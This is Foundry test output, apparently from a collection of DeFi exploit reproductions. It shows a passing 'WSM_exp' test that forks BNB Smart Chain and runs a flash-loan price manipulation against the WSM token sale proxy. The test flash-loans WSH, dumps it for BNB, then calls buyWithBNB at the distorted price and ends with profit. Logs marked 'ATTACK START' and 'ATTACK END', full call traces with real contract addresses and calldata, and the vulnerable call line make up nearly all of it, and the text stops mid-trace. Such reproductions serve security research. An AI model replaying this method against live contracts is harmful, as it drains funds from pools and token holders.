Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-04/WSM_exp.sol:18:1:
   |
18 | contract WSM is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-04/WSM_exp.sol:82:5:
   |
82 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-04/WSM_exp.sol:62:9:
   |
62 |         proxy_.call{value: address(this).balance}(abi.encodeWithSignature("buyWithBNB(uint256,bool)", 2_770_000, false));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/WSM_exp.sol:43:51:
   |
43 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) public {
   |                                                   ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/WSM_exp.sol:43:65:
   |
43 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) public {
   |                                                                 ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 759.43ms (1.87ms CPU time)

Ran 1 test for src/test/2024-04/WSM_exp.sol:WSM
[PASS] testExploit() (gas: 610236)
Logs:
  1. before attack wsh token balance of this =  0
  2. bnb_wsh_10000 pool wsh balance after flashloan =  5000000000000000000000000
  3. balance after exchanging wsh for bnb =  37344712626082242493
  4. [ ============= ATTACK START ============= ]
  5. wsh balance after attack function buyWithBNB() =  2770000000000000000000000
  6. [ ============= ATTACK END ============= ]
  7. repay flashloan for bnb_wsh_10000 pool
  8. after attack wsh token balance of this =  2517438179912631607253979

Traces:
  [115897] WSM::setUp()
    ├─ [0] VM::createSelectFork("bsc", 37569860 [3.756e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::deal(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ [266] 0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E::token0() [staticcall]
    │   └─ ← [Return] 0x62694D43Ccb9B64e76e38385d15e325c7712A735
    ├─ [308] 0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E::token1() [staticcall]
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [26834] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::approve(0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, 10000000000000000000000000000000 [1e31])
    │   ├─ emit Approval(owner: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, value: 10000000000000000000000000000000 [1e31])
    │   └─ ← [Return] true
    ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, 10000000000000000000000000000000 [1e31])
    │   ├─ emit Approval(owner: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, value: 10000000000000000000000000000000 [1e31])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [701036] WSM::testExploit()
    ├─ [2626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("1. before attack wsh token balance of this = ", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [680894] 0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E::flash(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5000000000000000000000000 [5e24], 0, 0x)
    │   ├─ [2626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E) [staticcall]
    │   │   └─ ← [Return] 5076689927771500273502372 [5.076e24]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E) [staticcall]
    │   │   └─ ← [Return] 81756621717182567206 [8.175e19]
    │   ├─ [32543] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transfer(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5000000000000000000000000 [5e24])
    │   │   ├─ emit Transfer(from: 0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E, to: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5000000000000000000000000 [5e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0c133ccc9899d10bde0278674e66efe58d11376f728b6916551edfcd01aa314a: 0x000000000000000000000000000000000000000000043307e9956c2b532c88a4 → 0x00000000000000000000000000000000000000000000103d5e8b6b872e2c88a4
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000422ca8b0a00a425000000
    │   │   └─ ← [Return] true
    │   ├─ [617342] WSM::uniswapV3FlashCallback(50000000000000000000000 [5e22], 0, 0x)
    │   │   ├─ [626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 5000000000000000000000000 [5e24]
    │   │   ├─ [0] console::log("2. bnb_wsh_10000 pool wsh balance after flashloan = ", 5000000000000000000000000 [5e24]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [221996] 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x62694D43Ccb9B64e76e38385d15e325c7712A735, tokenOut: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, fee: 3000, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1712247921 [1.712e9], amountIn: 5000000000000000000000000 [5e24], amountOutMinimum: 1, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [214342] 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a::swap(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 5000000000000000000000000 [5e24], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b62694d43ccb9b64e76e38385d15e325c7712a735000bb8bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 37344712626082242493 [3.734e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, to: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 37344712626082242493 [3.734e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1929d421df4e9a2d5b4b7a18f2d7e1ad32c026503a6b742f65a9db089c8a0a62: 0x000000000000000000000000000000000000000000000004176086efdcd50401 → 0x000000000000000000000000000000000000000000000002111d74aa1027a444
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000206431245ccad5fbd
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 108783178168262673449102909 [1.087e26]
    │   │   │   │   ├─ [20280] 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18::uniswapV3SwapCallback(5000000000000000000000000 [5e24], -37344712626082242493 [-3.734e19], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b62694d43ccb9b64e76e38385d15e325c7712a735000bb8bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [16035] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transferFrom(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, 5000000000000000000000000 [5e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, value: 5000000000000000000000000 [5e24])
    │   │   │   │   │   │   ├─ emit Approval(owner: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, value: 9999995000000000000000000000000 [9.999e30])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x68b5399ed399b57215b85164862dbae5daf775911452d6413400f06bd01c844e: 0x00000000000000000000000000000000000000000059fbbbe7adc760cacc2e3d → 0x0000000000000000000000000000000000000000005e1e8672b7c804efcc2e3d
    │   │   │   │   │   │   │   @ 0xcf9203adb2f546c451e04d070bd3550ae686b0fc6833e0f30d4fcf01b054bce1: 0x000000000000000000000000000000000000007e37be2022c0914b2680000000 → 0x000000000000000000000000000000000000007e37b9fd5835874a825b000000
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000422ca8b0a00a425000000 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 113783178168262673449102909 [1.137e26]
    │   │   │   │   ├─ emit Swap(param0: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, param1: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 5000000000000000000000000 [5e24], param3: -37344712626082242493 [-3.734e19], param4: 651958020336726230952259 [6.519e23], param5: 21489783606051559119 [2.148e19], param6: -234169 [-2.341e5])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d1: 0x0165bbd3f6000000000000000000000000000000000000000000000000000000 → 0x010053007b0000000000000000000000b75e234474ed4b948bffff78a231802c
    │   │   │   │   │   @ 0: 0x000100000100010000fe5074000000000000000001059afdcee6051db1134302 → 0x000100000100010000fc6d47000000000000000000008a0eb710da9e97fbe943
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0cf: 0 → 0x00000000000000000000000000000002fdffcc740faf9e3b0e05df455896c63f
    │   │   │   │   │   @ 8: 0x010000000000000000000000b75d5c6e649417949cffff78a2c93764660ed417 → 0x010000000000000000000000b75e234474ed4b948bffff78a231802c660ed471
    │   │   │   │   │   @ 1: 0x00000000000000000000000000000002faa6784de1d2cddae7eee3034dbd62ae → 0x0000000000000000000000000000016fe47cfca7c4c6d262a694d4be09b9dab4
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d0: 0 → 0x00000000000000000000000000000000000490fa9aca367f2e6a1bd1e4091c02
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000073dfd0d043e2880ae47f → 0x0000000000000000000000000000000000000000000000012a3b0c54fab756cf
    │   │   │   │   └─ ← [Return] 5000000000000000000000000 [5e24], -37344712626082242493 [-3.734e19]
    │   │   │   └─ ← [Return] 37344712626082242493 [3.734e19]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 37344712626082242493 [3.734e19]
    │   │   ├─ [0] console::log("3. balance after exchanging wsh for bnb = ", 37344712626082242493 [3.734e19]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 37344712626082242493 [3.734e19]
    │   │   ├─ [9181] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(37344712626082242493 [3.734e19])
    │   │   │   ├─ [41] WSM::fallback{value: 37344712626082242493}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 37344712626082242493 [3.734e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000206431245ccad5fbd → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] console::log("4. [ ============= ATTACK START ============= ]") [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [216841] 0xFB071837728455c581f370704b225ac9eABDfa4a::207b432a{value: 37344712626082242493}(00000000000000000000000000000000000000000000000000000000002a44500000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   ├─ [209519] 0xC0afd0E40Bb3DCAeBd9451aa5c319B745bF792B4::207b432a{value: 37344712626082242493}(00000000000000000000000000000000000000000000000000000000002a44500000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   ├─ [122827] 0xF49D24216Cb5FE7f21b6b47C0F45a4F80d21c7F0::quoteExactOutputSingle(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x62694D43Ccb9B64e76e38385d15e325c7712A735, 3000, 2770000000000000000000000 [2.77e24], 0)
    │   │   │   │   │   ├─ [97333] 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a::swap(0xF49D24216Cb5FE7f21b6b47C0F45a4F80d21c7F0, false, -2770000000000000000000000 [-2.77e24], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x62694d43ccb9b64e76e38385d15e325c7712a735000bb8bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c)
    │   │   │   │   │   │   ├─ [27743] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transfer(0xF49D24216Cb5FE7f21b6b47C0F45a4F80d21c7F0, 2770000000000000000000000 [2.77e24])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, to: 0xF49D24216Cb5FE7f21b6b47C0F45a4F80d21c7F0, value: 2770000000000000000000000 [2.77e24])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xf079e30173a8ad60cdf6c71ccb783697ba420187713055432f2a9626d720fbe0: 0 → 0x000000000000000000000000000000000000000000024a92003a4702df400000
    │   │   │   │   │   │   │   │   @ 0x68b5399ed399b57215b85164862dbae5daf775911452d6413400f06bd01c844e: 0x0000000000000000000000000000000000000000005e1e8672b7c804efcc2e3d → 0x0000000000000000000000000000000000000000005bd3f4727d8102108c2e3d
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 38126758294152782916 [3.812e19]
    │   │   │   │   │   │   ├─ [2691] 0xF49D24216Cb5FE7f21b6b47C0F45a4F80d21c7F0::uniswapV3SwapCallback(-2770000000000000000000000 [-2.77e24], 2619269777880106176 [2.619e18], 0x62694d43ccb9b64e76e38385d15e325c7712a735000bb8bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c)
    │   │   │   │   │   │   │   └─ ← [Revert] custom error 0x00000000: 0000000000000000000000000000000000000000245983fc4975c4c0
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000490fa9aca367f2e6a1bd1e4091c02 → 0x00000000000000000000000000000000000556e06bad41826d57a062d747729a
    │   │   │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0cf: 0x00000000000000000000000000000002fdffcc740faf9e3b0e05df455896c63f → 0x0000000000000000000000000000016ce67d3033b5173427988ef578b1231475
    │   │   │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d1: 0x010053007b0000000000000000000000b75e234474ed4b948bffff78a231802c → 0x0165bbd3f6000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000012a3b0c54fab756cf → 0x0000000000000000000000000000000000000000000073dfd0d043e2880ae47f
    │   │   │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d0: 0x00000000000000000000000000000000000490fa9aca367f2e6a1bd1e4091c02 → 0x000000000000000000000000000000000000c5aa20a060bbf2462ccfd6a25f5f
    │   │   │   │   │   │   │   @ 0: 0x000100000100010000fc6d47000000000000000000008a0eb710da9e97fbe943 → 0x000000000100010000fe4f33000000000000000001017210e3242238a75de6f1
    │   │   │   │   │   │   └─ ← [Revert] custom error 0x00000000: 0000000000000000000000000000000000000000245983fc4975c4c0
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000245983fc4975c4c0
    │   │   │   │   ├─ [0] 0xb03311570F7273e03578D659b0E3B60d9A4446A7::fallback{value: 2881196755668116793}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [41] WSM::fallback{value: 34463515870414125700}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [30543] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transfer(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2770000000000000000000000 [2.77e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0xFB071837728455c581f370704b225ac9eABDfa4a, to: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2770000000000000000000000 [2.77e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000024a92003a4702df400000
    │   │   │   │   │   │   @ 0x952fa8c3c1c18862d9206b14d8550456221902d3303b4977d01b798f1eeca179: 0x000000000000000000000000000000000000000000024bfe66b7a0542f080000 → 0x00000000000000000000000000000000000000000000016c667d59514fc80000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x4d8aead3491b7eba4b5c7a65fc17e493b9e63f9e433522fc5f6a85a168fc9d36
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000000000000002a4450
    │   │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x00000000000000000000000000000000000000000000000027fc112f1d9b2539000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000660ed471
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 227: 0x0000000000000000000000000000000000000000000000000000000000bfef61 → 0x0000000000000000000000000000000000000000000000000000000000ea33b1
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 2770000000000000000000000 [2.77e24]
    │   │   ├─ [0] console::log("5. wsh balance after attack function buyWithBNB() = ", 2770000000000000000000000 [2.77e24]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] console::log("6. [ ============= ATTACK END ============= ]") [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [120400] 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18::exactInputSingle{value: 34463515870414125700}(ExactInputSingleParams({ tokenIn: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, tokenOut: 0x62694D43Ccb9B64e76e38385d15e325c7712A735, fee: 3000, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1712247921 [1.712e9], amountIn: 34463515870414125700 [3.446e19], amountOutMinimum: 1, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [115217] 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a::swap(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 34463515870414125700 [3.446e19], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000bb862694d43ccb9b64e76e38385d15e325c7712a735000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [3843] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transfer(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4797438179912631607253979 [4.797e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, to: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4797438179912631607253979 [4.797e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000024a92003a4702df400000 → 0x000000000000000000000000000000000000000000064277a54f40b5b2065bdb
    │   │   │   │   │   │   @ 0x68b5399ed399b57215b85164862dbae5daf775911452d6413400f06bd01c844e: 0x0000000000000000000000000000000000000000005e1e8672b7c804efcc2e3d → 0x0000000000000000000000000000000000000000005a26a0cda2ce521d05d262
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 38126758294152782916 [3.812e19]
    │   │   │   │   ├─ [37909] 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18::uniswapV3SwapCallback(-4797438179912631607253979 [-4.797e24], 34463515870414125700 [3.446e19], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c000bb862694d43ccb9b64e76e38385d15e325c7712a735000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 34463515870414125700}()
    │   │   │   │   │   │   ├─ emit Deposit(dst: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, wad: 34463515870414125700 [3.446e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x8e3fbab9191a973e2cd31a61a09f7793fb6c8f9bf9a2808f6a4b524696ab5fdd: 0 → 0x000000000000000000000000000000000000000000000001de470116af123a84
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, 34463515870414125700 [3.446e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, to: 0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a, value: 34463515870414125700 [3.446e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1929d421df4e9a2d5b4b7a18f2d7e1ad32c026503a6b742f65a9db089c8a0a62: 0x000000000000000000000000000000000000000000000002111d74aa1027a444 → 0x000000000000000000000000000000000000000000000003ef6475c0bf39dec8
    │   │   │   │   │   │   │   @ 0x8e3fbab9191a973e2cd31a61a09f7793fb6c8f9bf9a2808f6a4b524696ab5fdd: 0x000000000000000000000000000000000000000000000001de470116af123a84 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xf420603317a0996A3fCe1b1A80993Eaef6f7AE1a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 72590274164566908616 [7.259e19]
    │   │   │   │   ├─ emit Swap(param0: 0x74Dca1Bd946b9472B2369E11bC0E5603126E4C18, param1: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -4797438179912631607253979 [-4.797e24], param3: 34463515870414125700 [3.446e19], param4: 315829432589320851649757864 [3.158e26], param5: 547200816059441698497663 [5.472e23], param6: -110504 [-1.105e5])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000012a3b0c54fab756cf → 0x0000000000000000000000000000000000000000000073dfd0d043e2880ae47f
    │   │   │   │   │   @ 0: 0x000100000100010000fc6d47000000000000000000008a0eb710da9e97fbe943 → 0x000100000100010000fe5058000000000000000001053f7bd8efe182b53082a8
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d1: 0x010053007b0000000000000000000000b75e234474ed4b948bffff78a231802c → 0x0165bbd3f6000000000000000000000000000000000000000000000000000000
